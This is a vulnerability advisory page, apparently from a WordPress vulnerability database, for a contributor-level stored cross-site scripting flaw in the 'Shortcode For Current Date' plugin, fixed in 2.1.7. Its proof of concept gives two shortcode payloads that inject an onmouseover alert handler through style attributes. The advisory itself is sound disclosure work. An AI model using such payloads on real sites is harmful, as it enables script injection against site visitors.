Shortcode For Current Date < 2.1.7 – Contributor+ Stored Cross-Site Scripting | Plugin Vulnerabilities

Description

The plugin does not escape the some of its shortcode's attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks

Proof of Concept

[current_date format='d/m/Y' size="10px;position:absolute;top:0;left:0;max-width:9999px;width:9999px;height:9999px' onmouseover=alert(/XSS/)//"]
[current_date format='d/m/Y' color="red;position:absolute;top:0;left:0;max-width:9999px;width:9999px;height:9999px' onmouseover=alert(/XSS/)//"]

Affects Plugins

shortcode-for-current-date

Fixed in 2.1.7

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Submitter

Ryan Dewhurst

Verified

Yes

WPVDB ID

a634691f-1c28-460a-8eac-25c822ae95c5

Timeline

Publicly Published

2022-07-07 (about 3 years ago)

Added

2022-07-07 (about 3 years ago)

Last Updated

2022-10-31 (about 3 years ago)

Other

Published

Title

Published

2024-11-18

Title

AI Responsive Gallery Album <= 1.4 - Reflected Cross-Site Scripting

Published

2019-05-27

Title

Event Management Tickets Booking By Event Monster <= 1.0.5 - Stored XSS

Published

2024-05-20

Title

Master Slider – Responsive Touch Slider < 3.9.10 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-02-16

Title

WP Easy Post Mailer <= 0.64 - Reflected Cross-Site Scripting

Published

2025-03-31

Title

byBrick Accordion <= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting